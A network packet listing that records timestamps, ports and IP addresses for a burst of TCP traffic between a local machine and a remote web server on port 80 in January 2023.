Jan 4, 2023 16:47:45.420805931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420816898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420834064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420851946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420860052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420877934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420888901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420902967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420917034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420938969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420944929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420965910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.420973063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.420989037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421001911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421020031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421029091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421037912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421056032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421072960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421082973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421092033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421111107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421128035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421137094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421149015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421165943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421186924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421192884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421210051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421221972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421235085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421247959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421266079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421279907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421287060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421295881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421324968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421331882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421353102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421354055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421377897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421380997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421401978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421408892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421422958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421437025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421452045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421463966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421478987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421490908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421508074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421519041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421536922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421546936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421561003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421574116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421591997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421601057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421612024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421628952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421646118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421655893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421673059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421683073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421699047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421710968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421727896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421740055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421755075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421767950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421785116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421793938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421813011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421823978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421850920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421850920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421866894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421888113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421891928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421900034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421928883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421935081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421955109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.421956062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421982050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.421983004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422002077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422014952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422024012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422043085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422070026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422080040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422096968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422105074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422123909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422125101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422149897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422153950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422172070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422182083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422195911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422214985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422226906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422228098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422245026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422264099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422272921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422285080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422301054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422308922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422327995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422336102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422353029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422355890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422378063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422384977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422403097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422413111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422425985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422441006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422458887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422466993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422481060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422496080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422512054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422522068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422534943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422549009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422565937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422576904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422595978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422604084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422617912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422633886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422650099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422661066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422679901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422700882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422702074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422730923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422750950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422759056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422772884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422786951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422804117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422815084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422826052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422842026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422858953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422871113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422888041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422898054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422920942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422925949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422936916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422954082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422969103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.422981024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.422996044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423008919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423026085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423036098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423054934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423063993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423086882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423091888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423108101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423120975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423130989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423149109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423172951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423175097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423202991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423204899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423228979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423230886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423254013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423259974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423275948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423289061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423297882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423316956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423331976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423345089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423360109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423372984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423388958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423402071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423418045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423429966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423449039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423456907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423484087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423485041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423504114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423515081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423536062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423548937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423566103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423577070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423597097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423604965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423624992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423633099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423646927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423660994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423680067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423687935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423716068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423736095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423743010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423754930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423770905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423777103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423799038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423800945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423825026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423830032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423850060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423858881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423878908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423887968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423898935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423917055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423935890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423944950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423964977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.423974991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.423995972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424004078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424017906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424031973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424048901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424060106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424082041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424088001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424103022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424115896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424134970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424144983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424165010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424171925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424185991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424201012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424221039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424228907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424242973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424257040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424276114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424284935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424305916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424313068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424326897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424341917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424362898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424369097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424382925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424396992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424417019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424424887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424449921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424453974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424478054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424482107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424499035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424510002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424526930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424539089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424556017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424566031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424590111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424592972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424616098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424622059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424637079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424650908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424671888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424685001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424690962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424710989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424732924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424738884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424758911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424767971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424781084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424797058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424813986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424828053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424844980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424856901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424873114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424884081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424901962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424911022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424932003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424940109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424951077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424967051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.424984932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.424993992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425009012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425021887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425041914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425049067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425062895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425076962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425096035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425103903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425121069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425129890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425146103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425158978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425179005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425187111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425199986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425215006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425232887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425241947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425259113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425268888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425285101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425296068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425319910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425326109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425342083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425354004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425375938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425381899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425395012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425407887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425429106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425436020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425453901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425465107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425478935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425492048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425513029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.425519943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.425535917 CET	49696	80	192.168.2.4	66.235.200.147
